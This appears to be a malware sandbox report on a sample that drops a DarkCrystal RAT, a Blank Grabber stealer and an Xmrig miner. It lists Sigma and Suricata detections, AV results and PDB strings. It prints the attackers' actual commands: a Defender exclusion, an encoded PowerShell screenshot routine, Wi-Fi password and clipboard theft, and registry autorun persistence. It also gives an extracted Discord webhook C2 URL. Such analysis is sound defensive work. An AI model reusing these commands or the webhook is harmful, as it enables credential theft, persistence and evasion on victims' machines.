Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\ProgramData\svchost.exe" , ParentImage: C:\ProgramData\svchost.exe, ParentProcessId: 3808, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe" , ProcessId: 7080, ProcessName: wscript.exe

Sigma detected: Windows Binaries Write Suspicious Extensions

Source: File created

Author: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\ProgramData\svchost.exe, ProcessId: 3808, TargetFilename: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Recovery\HpQPPZazcv.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe, ProcessId: 7768, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HpQPPZazcv

Sigma detected: CurrentVersion NT Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Recovery\HpQPPZazcv.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe, ProcessId: 7768, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Source: Process started

Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zgtjfxku\zgtjfxku.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zgtjfxku\zgtjfxku.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor/ChainComServermonitor.exe", ParentImage: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe, ParentProcessId: 7768, ParentProcessName: ChainComServermonitor.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zgtjfxku\zgtjfxku.cmdline", ProcessId: 7084, ProcessName: csc.exe

Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\ProgramData\Microsoft\based.exe" , ParentImage: C:\ProgramData\Microsoft\based.exe, ParentProcessId: 6828, ParentProcessName: based.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", ProcessId: 7900, ProcessName: cmd.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: SCR File Write Event

Source: File created

Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\ProgramData\Microsoft\based.exe, ProcessId: 6828, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr

Sigma detected: Startup Folder File Write

Source: File created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\ProgramData\Microsoft\based.exe, ProcessId: 6828, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp

Sigma detected: Suspicious Execution of Powershell with Base64

Source: Process started

Sigma detected: Suspicious Powershell In Registry Run Keys

Source: Registry Key set

Author: frack113, Florian Roth (Nextron Systems): Data: Details: "C:\Recovery\powershell.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe, ProcessId: 7768, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\powershell

Sigma detected: Suspicious Screensaver Binary File Creation

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\ProgramData\Microsoft\based.exe, ProcessId: 6828, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\ProgramData\svchost.exe" , CommandLine: "C:\ProgramData\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\ProgramData\svchost.exe, NewProcessName: C:\ProgramData\svchost.exe, OriginalFileName: C:\ProgramData\svchost.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe -pbeznogym, ParentImage: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe, ParentProcessId: 7008, ParentProcessName: s.exe, ProcessCommandLine: "C:\ProgramData\svchost.exe" , ProcessId: 3808, ProcessName: svchost.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\ProgramData\svchost.exe" , ParentImage: C:\ProgramData\svchost.exe, ParentProcessId: 3808, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe" , ProcessId: 7080, ProcessName: wscript.exe

Sigma detected: Dynamic CSharp Compile Artefact

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe, ProcessId: 7768, TargetFilename: C:\Users\user\AppData\Local\Temp\zgtjfxku\zgtjfxku.cmdline

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe', CommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe', CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6972, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe', ProcessId: 6468, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\ProgramData\svchost.exe" , CommandLine: "C:\ProgramData\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\ProgramData\svchost.exe, NewProcessName: C:\ProgramData\svchost.exe, OriginalFileName: C:\ProgramData\svchost.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe -pbeznogym, ParentImage: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe, ParentProcessId: 7008, ParentProcessName: s.exe, ProcessCommandLine: "C:\ProgramData\svchost.exe" , ProcessId: 3808, ProcessName: svchost.exe

Data Obfuscation

Sigma detected: Dot net compiler compiles file from suspicious location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zgtjfxku\zgtjfxku.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zgtjfxku\zgtjfxku.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor/ChainComServermonitor.exe", ParentImage: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe, ParentProcessId: 7768, ParentProcessName: ChainComServermonitor.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zgtjfxku\zgtjfxku.cmdline", ProcessId: 7084, ProcessName: csc.exe

Stealing of Sensitive Information

Sigma detected: Capture Wi-Fi password

Source: Process started

Author: Joe Security: Data: Command: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\ProgramData\Microsoft\based.exe" , ParentImage: C:\ProgramData\Microsoft\based.exe, ParentProcessId: 6828, ParentProcessName: based.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", ProcessId: 7932, ProcessName: cmd.exe

Snort Signatures

⊘No Snort rule has matched

Suricata Signatures

ETPRO COINMINER XMR CoinMiner Usage - Source IP: 192.168.2.4 - Destination IP: 95.179.241.203

Timestamp:	2024-08-01T04:27:06.688070+0200
SID:	2826930
Source Port:	49738
Destination Port:	443
Protocol:	TCP
Classtype:	Crypto Currency Mining Activity Detected

ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) - Source IP: 192.168.2.4 - Destination IP: 194.58.42.154

Timestamp:	2024-08-01T04:27:45.505027+0200
SID:	2048095
Source Port:	49739
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE [ANY.RUN] DarkCrystal Rat Exfiltration (POST) - Source IP: 192.168.2.4 - Destination IP: 194.58.42.154

Timestamp:	2024-08-01T04:28:25.451584+0200
SID:	2048130
Source Port:	49753
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro) - Source IP: 192.168.2.4 - Destination IP: 1.1.1.1

Timestamp:	2024-08-01T04:27:42.804877+0200
SID:	2036289
Source Port:	59750
Destination Port:	53
Protocol:	UDP
Classtype:	Crypto Currency Mining Activity Detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for dropped file

Source: C:\Program Files\Windows Defender\en-US\based.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Recovery\powershell.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\ProgramData\setup.exe	Avira: detection malicious, Label: TR/CoinMiner.lnxah
Source: C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Recovery\HpQPPZazcv.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\AppData\Local\Temp\O7MNNZ56x3.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Program Files\Google\Chrome\updater.exe	Avira: detection malicious, Label: TR/CoinMiner.lnxah
Source: C:\ProgramData\svchost.exe	Avira: detection malicious, Label: VBS/Runner.VPG

Found malware configuration

Source: based.exe.6828.4.memstrmin

Malware Configuration Extractor: Blank Grabber {"C2 url": "https://discord.com/api/webhooks/1264025291794157628/Sz1WQEp-Y2XqBUw8OiovYJ-HSmiCmR36z5iq2VLDwzDIXt2tsN2CAivzv3lJ-Ow3IUya"}

Multi AV Scanner detection for dropped file

Source: C:\Program Files\Google\Chrome\updater.exe	ReversingLabs: Detection: 71%
Source: C:\Program Files\Windows Defender\en-US\based.exe	ReversingLabs: Detection: 91%
Source: C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe	ReversingLabs: Detection: 91%
Source: C:\ProgramData\Microsoft\based.exe	ReversingLabs: Detection: 55%
Source: C:\ProgramData\Microsoft\hacn.exe	ReversingLabs: Detection: 70%
Source: C:\ProgramData\setup.exe	ReversingLabs: Detection: 71%
Source: C:\ProgramData\svchost.exe	ReversingLabs: Detection: 60%
Source: C:\Recovery\HpQPPZazcv.exe	ReversingLabs: Detection: 91%
Source: C:\Recovery\powershell.exe	ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe	ReversingLabs: Detection: 21%
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Local\Temp\wxyubnjmnlae.tmp	ReversingLabs: Detection: 91%

Multi AV Scanner detection for submitted file

Source: 8Ck8T5qRcC.exe	ReversingLabs: Detection: 52%
Source: 8Ck8T5qRcC.exe	Virustotal: Detection: 37%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Program Files\Windows Defender\en-US\based.exe	Joe Sandbox ML: detected
Source: C:\Recovery\powershell.exe	Joe Sandbox ML: detected
Source: C:\ProgramData\setup.exe	Joe Sandbox ML: detected
Source: C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe	Joe Sandbox ML: detected
Source: C:\Recovery\HpQPPZazcv.exe	Joe Sandbox ML: detected
Source: C:\Program Files\Google\Chrome\updater.exe	Joe Sandbox ML: detected
Source: C:\ProgramData\svchost.exe	Joe Sandbox ML: detected
Source: C:\ProgramData\Microsoft\hacn.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: 8Ck8T5qRcC.exe

Joe Sandbox ML: detected

Bitcoin Miner

Yara detected Xmrig cryptocurrency miner

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Source: 8Ck8T5qRcC.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Directory created: C:\Program Files\Windows Defender\en-US\based.exe
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Directory created: C:\Program Files\Windows Defender\en-US\7c80744c9cd64c
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Directory created: C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Directory created: C:\Program Files\Windows Security\BrowserCore\en-US\886983d96e3d3e

Source: 8Ck8T5qRcC.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 8Ck8T5qRcC.exe, 00000000.00000000.1653907239.0000000000DC6000.00000002.00000001.01000000.00000003.sdmp, 8Ck8T5qRcC.exe, 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmp, s.exe, 00000007.00000000.1692832193.0000000000DB3000.00000002.00000001.01000000.00000011.sdmp, s.exe, 00000007.00000003.1702500179.0000000007643000.00000004.00000020.00020000.00000000.sdmp, s.exe, 00000007.00000002.1728643045.0000000000DB3000.00000002.00000001.01000000.00000011.sdmp, svchost.exe, 0000000E.00000002.1729961468.0000000000193000.00000002.00000001.01000000.0000001E.sdmp, svchost.exe, 0000000E.00000003.1722014407.0000000005600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000000.1720220248.0000000000193000.00000002.00000001.01000000.0000001E.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: hacn.exe, 00000001.00000003.1686348982.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\_w\1\b\bin\amd64\_lzma.pdbMM source: based.exe, 00000004.00000002.2415416350.00007FFE126EB000.00000040.00000001.01000000.00000012.sdmp
Source:	Binary string: D:\_w\1\b\bin\amd64\select.pdb source: based.exe, 00000004.00000002.2418711029.00007FFE130C1000.00000040.00000001.01000000.00000017.sdmp
Source:	Binary string: D:\_w\1\b\bin\amd64\sqlite3.pdb source: based.exe, based.exe, 00000004.00000002.2397463940.00007FFDFF191000.00000040.00000001.01000000.00000015.sdmp
Source:	Binary string: D:\_w\1\b\bin\amd64\_sqlite3.pdb source: based.exe, 00000004.00000002.2414595024.00007FFE11EB1000.00000040.00000001.01000000.00000014.sdmp
Source:	Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_A source: based.exe
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdbMM source: hacn.exe, 00000001.00000003.1669683608.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\_w\1\b\libssl-1_1.pdb source: based.exe, based.exe, 00000004.00000002.2391546789.00007FFDFAC15000.00000040.00000001.01000000.0000001A.sdmp
Source:	Binary string: D:\_w\1\b\bin\amd64\python310.pdb source: based.exe, 00000004.00000002.2394342718.00007FFDFB31F000.00000040.00000001.01000000.0000000D.sdmp
Source:	Binary string: D:\_w\1\b\bin\amd64\_bz2.pdb source: based.exe, 00000004.00000002.2415059724.00007FFE11ED1000.00000040.00000001.01000000.00000013.sdmp
Source:	Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: based.exe, 00000004.00000002.2392560474.00007FFDFAEAF000.00000040.00000001.01000000.00000019.sdmp
Source:	Binary string: D:\_w\1\b\bin\amd64\_queue.pdb source: based.exe, 00000004.00000002.2418451662.00007FFE12E11000.00000040.00000001.01000000.0000001C.sdmp
Source:	Binary string: D:\_w\1\b\bin\amd64\_ssl.pdb source: based.exe, 00000004.00000002.2398061369.00007FFE10241000.00000040.00000001.01000000.00000018.sdmp
Source:	Binary string: D:\_w\1\b\bin\amd64\_hashlib.pdb source: based.exe, 00000004.00000002.2398598485.00007FFE10301000.00000040.00000001.01000000.0000001B.sdmp
Source:	Binary string: D:\_w\1\b\bin\amd64\_lzma.pdb source: based.exe, 00000004.00000002.2415416350.00007FFE126EB000.00000040.00000001.01000000.00000012.sdmp
Source:	Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1n 15 Mar 2022built on: Tue Mar 15 18:32:50 2022 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-1_1"not available source: based.exe, 00000004.00000002.2392560474.00007FFDFAEAF000.00000040.00000001.01000000.00000019.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\select.pdb source: hacn.exe, 00000001.00000003.1685995112.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: d:\a01\_work\12\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: hacn.exe, 00000001.00000003.1666084515.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1667289838.000001F919A0F000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000002.1763556973.00007FFE13311000.00000002.00000001.01000000.0000000C.sdmp, based.exe, 00000004.00000002.2419769711.00007FFE13241000.00000002.00000001.01000000.0000000E.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: hacn.exe, 00000001.00000003.1669308184.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\_w\1\b\bin\amd64\_ctypes.pdb source: based.exe, 00000004.00000002.2419464738.00007FFE13201000.00000040.00000001.01000000.0000000F.sdmp
Source:	Binary string: D:\_w\1\b\libssl-1_1.pdb@@ source: based.exe, 00000004.00000002.2391546789.00007FFDFAC15000.00000040.00000001.01000000.0000001A.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\python310.pdb source: hacn.exe, 00000003.00000002.1735603222.00007FFDFB78F000.00000002.00000001.01000000.0000000B.sdmp
Source:	Binary string: D:\_w\1\b\bin\amd64\_socket.pdb source: based.exe, 00000004.00000002.2414008753.00007FFE11511000.00000040.00000001.01000000.00000016.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: hacn.exe, 00000001.00000003.1669683608.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp
